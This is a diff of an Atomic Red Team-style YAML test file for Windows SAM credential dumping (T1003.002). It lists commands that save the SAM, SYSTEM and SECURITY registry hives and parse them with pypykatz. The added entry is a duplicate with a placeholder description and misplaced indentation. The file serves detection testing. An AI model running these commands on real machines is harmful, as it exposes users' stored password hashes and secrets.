atomics/T1003.002/T1003.002.yaml (before)
attack_technique: T1003.002
display_name: "OS Credential Dumping: Security Account Manager"
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
  auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
  description: |
    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
    via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

    Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
  supported_platforms:
  - windows
  executor:
    command: |
      reg save HKLM\sam %temp%\sam
      reg save HKLM\system %temp%\system
      reg save HKLM\security %temp%\security
    cleanup_command: |
      del %temp%\sam >nul 2> nul
      del %temp%\system >nul 2> nul
      del %temp%\security >nul 2> nul
    name: command_prompt
    elevation_required: true

- name: Registry parse with pypykatz
  auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
  description: |
    Parses registry hives to obtain stored credentials
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
      if (python --version) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "Python 3 must be installed manually"
  - description: |
      Computer must have pip installed
    prereq_command: |
      if (pip3 -V) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "PIP must be installed manually"
  - description: |
      pypykatz must be installed and part of PATH
    prereq_command: |
      if (cmd /c pypykatz -h) {exit 0} else {exit 1}
    get_prereq_command: |
      pip3 install pypykatz
  executor:
    command: |
      pypykatz live registry
    name: command_prompt
    elevation_required: true

atomics/T1003.002/T1003.002.yaml (after)
attack_technique: T1003.002
display_name: "OS Credential Dumping: Security Account Manager"
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
  auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
  description: |
    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
    via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

    Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
  supported_platforms:
  - windows
  executor:
    command: |
      reg save HKLM\sam %temp%\sam
      reg save HKLM\system %temp%\system
      reg save HKLM\security %temp%\security
    cleanup_command: |
      del %temp%\sam >nul 2> nul
      del %temp%\system >nul 2> nul
      del %temp%\security >nul 2> nul
    name: command_prompt
    elevation_required: true

- name: Registry parse with pypykatz
  auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
  description: |
    Parses registry hives to obtain stored credentials
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Computer must have python 3 installed
    prereq_command: |
      if (python --version) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "Python 3 must be installed manually"
  - description: |
      Computer must have pip installed
    prereq_command: |
      if (pip3 -V) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "PIP must be installed manually"
  - description: |
      pypykatz must be installed and part of PATH
    prereq_command: |
      if (cmd /c pypykatz -h) {exit 0} else {exit 1}
    get_prereq_command: |
      pip3 install pypykatz
  executor:
    command: |
      pypykatz live registry
    name: command_prompt
    elevation_required: true
  - name: dump credentials from windows registry
    description: This is just a description
    supported_platforms:
    - windows
    executor:
      command: |-
        reg save HKLM\sam %temp%\sam
        reg save HKLM\system %temp%\system
        reg save HKLM\security %temp%\security
      cleanup_command: |-
        del %temp%\sam >nul 2> nul
        del %temp%\system >nul 2> nul
        del %temp%\security >nul 2> nul
      name: command_prompt
      elevation_required: true

atomics/T1003.002/T1003.002.yaml (diff)
@@ -53,3 +53,18 @@ atomic_tests:
       pypykatz live registry
     name: command_prompt
     elevation_required: true
+  - name: dump credentials from windows registry
+    description: This is just a description
+    supported_platforms:
+    - windows
+    executor:
+      command: |-
+        reg save HKLM\sam %temp%\sam
+        reg save HKLM\system %temp%\system
+        reg save HKLM\security %temp%\security
+      cleanup_command: |-
+        del %temp%\sam >nul 2> nul
+        del %temp%\system >nul 2> nul
+        del %temp%\security >nul 2> nul
+      name: command_prompt
+      elevation_required: true
